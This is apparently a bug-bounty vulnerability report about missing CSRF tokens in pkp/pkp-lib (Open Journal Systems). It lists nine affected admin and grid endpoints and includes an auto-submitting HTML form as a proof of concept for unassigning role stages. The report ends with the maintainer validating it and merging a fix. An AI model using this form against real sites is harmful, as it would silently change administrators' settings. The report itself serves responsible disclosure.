Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 5th 2021


Description

Missing CSRF token in role stage assignment, save language settings, and task notification

1: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5

2: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/assign-stage?stageId=1&userGroupId=5

3: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/languages/manage-language-grid/save-language-setting?rowId=en_US&setting=supportedLocales&value=

4: http://10.0.2.15/index.php/index/admin/clearDataCache

5: http://10.0.2.15/index.php/index/admin/clearTemplateCache

6: http://10.0.2.15/index.php/index/admin/clearScheduledTaskLogFiles

7: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-read?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

8: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-new?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

9: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/delete?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

Proof of Concept

Example: Unassign stage

Open the index.html:

<html>                                                                                                             
  <body>                                                                                                           
        <form action="http://[OJS-IP+PORT]/ojs/index.php/[JOURNAL_NAME]/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5" method="POST"> 
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html> 

Impact

This vulnerability is capable of changing user role stage assignments and changing language settings for forms

Occurences

missing csrf validation for language settings

missing csrf validation for clear scheduled task

missing validation of csrf in mark read

Missing csrf tokens for the 3 admin control actions

missing csrf token in assign / unassign stage form

missing csrf validation for clear data cache

missing validation of csrf in mark new

missing validation of csrf in delete

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
haxatron modified their report
2 months ago
haxatron
2 months ago

Researcher


Hi @admin, maintainers have updated SECURITY.md at https://github.com/pkp/ojs/blob/main/SECURITY.md

Jamie Slome
2 months ago

Admin


I have left a comment on the GitHub Issue.

Alec Smecher validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher
2 months ago

I have filed this at https://github.com/pkp/pkp-lib/issues/7371 and will work on a fix. I'm not familiar with this website's model and left the bounty amount selection at its default.

haxatron
2 months ago

Researcher


Thanks for validating this report!

Alec Smecher confirmed that a fix has been merged on 62c07e 2 months ago
Alec Smecher has been awarded the fix bounty
userGroupForm.tpl#L11-L65 has been validated
index.tpl#L35-L37 has been validated